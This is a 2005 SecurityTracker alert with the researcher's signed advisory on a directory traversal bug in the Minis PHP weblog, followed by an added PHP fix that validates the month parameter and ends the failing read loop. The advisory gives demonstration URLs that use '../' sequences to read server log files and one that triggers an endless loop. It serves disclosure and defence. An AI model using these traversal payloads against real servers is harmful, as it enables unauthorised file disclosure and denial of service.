SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   Minis
Vendors:   minis.sourceforge.net
Minis Discloses Certain Files to Remote Users
SecurityTracker Alert ID:  1012911
SecurityTracker URL:  http://securitytracker.com/id/1012911
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 16 2005
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 0.2.1
Description:   Madelman reported a vulnerability in Minis. A remote user can view certain files on the system.

The script does not properly validate the user-supplied month parameter. A remote user can view files that have the '.log' file extension. A demonstration exploit URL is provided:

http://[target]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0

If the user attempts to view a file that the web server process does not have privileges to read, the script will enter an endless loop. A demonstration exploit URL is provided:

http://[target]/minis/minis.php?month=../../../../../../../../var/log/auth

The vendor was notified on December 31, 2004.

Impact:   A remote user can view files on the system that have the '.log' file extension.
Solution:   No solution was available at the time of this entry.
Vendor URL:  minis.sourceforge.net/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Minis directory traversal vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title: Minis directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 31/12/2004
Severity: Moderate

Summary:
- --------

(from vendor site: http://minis.sourceforge.net/)

Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesn't require any
databases, such as MySQL. Also, with some PHP-knowledge you'll be
able to configure Minis endlessly.

Minis doesn't check the month parameter which allows reading any file with .log extension

This vulnerability has been tested with Minis 0.2.1


Details:
- --------

If we want to read /var/log/XFree86.0.log:

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0
RETURNS: (looking at source of HTML)
[...]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This is a pre-release version of XFree86, and is not supported in any
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way.  Bugs may be reported to XFree86@XFree86.Org and patches submitted
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to fixes@XFree86.Org.  Before reporting bugs in pre-release versions,
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please check the latest version in the XFree86 CVS repository
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 root@cyberhq.internal.cyberhqz.com)
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: 15 August 2003
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X Protocol Version 11, Revision 0, Release 6.6
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Date: 29 May 2004
[...]

If we try to read a file that doesn't exist (in this example /var/log/XFree86.log) Minis returns "No such month"

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86
RESPONSE:
No such month.


If we try to read a file the webserver doesn't have authorization to, Minis enters an endless loop which
could cause an incredible amount of bandwidth spent by the server or even a DoS

REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/auth
RETURNS:
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to open stream: Permission denied in /var/www/minis/minis.php on line 109

../../../../../../../../var/log/auth

Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112

Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112
[...]


Timeline
- --------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFB6qyg3RWooxY20cIRAg4cAJ41z36lEK44et5nx4V6tspofoo+zACgnLr6
nUEj8oDBySiBN2ScbMinO7s=
=sSF1
-----END PGP SIGNATURE-----
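
One way to close both issues described above (the unvalidated month parameter and the read loop that never ends when fopen() fails), as an added example that is not Minis code and not from the advisory author. The function names and the YYYY-MM month format are assumptions; the blog/ directory and the .log suffix are taken from the fopen() warning quoted in the advisory.

```php
<?php
// Added example, not Minis source; function names are hypothetical. The blog/
// prefix and .log suffix come from the fopen() warning in the advisory.
const BLOG_DIR = __DIR__ . '/blog';

// Map the user-supplied month to a file inside BLOG_DIR, or null if rejected.
function resolve_month_file(string $month, string $blogDir = BLOG_DIR): ?string
{
    // Assumption: files are named like "2004-12.log"; allow-list that format
    // so "/", "\" and ".." never reach the filesystem call.
    if (preg_match('/\A\d{4}-\d{2}\z/', $month) !== 1) {
        return null;
    }
    $base = realpath($blogDir);
    $path = realpath($blogDir . '/' . $month . '.log');
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // Defence in depth: the canonical path must still sit under blog/.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read entries; null when the file cannot be opened, so no feof() loop on false.
function read_month_entries(string $path): ?array
{
    $fp = @fopen($path, 'r');
    if ($fp === false) {
        return null; // e.g. permission denied: stop before the read loop
    }
    $entries = [];
    // fgets() returns false at EOF and on error, so the loop always terminates.
    while (($line = fgets($fp)) !== false) {
        $entries[] = rtrim($line, "\r\n");
    }
    fclose($fp);
    return $entries;
}

$month = isset($_GET['month']) && is_string($_GET['month']) ? $_GET['month'] : '';
$path = resolve_month_file($month);
$entries = $path !== null ? read_month_entries($path) : null;
if ($entries === null) {
    http_response_code(404);
    exit('No such month.');
}
foreach ($entries as $entry) { echo htmlspecialchars($entry, ENT_QUOTES, 'UTF-8'), "<br>\n"; }
```

Missing, unreadable and rejected month values all get the same "No such month." response, so the reply does not reveal which files exist outside blog/.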
 
 



Copyright 2020, SecurityGlobal.net LLC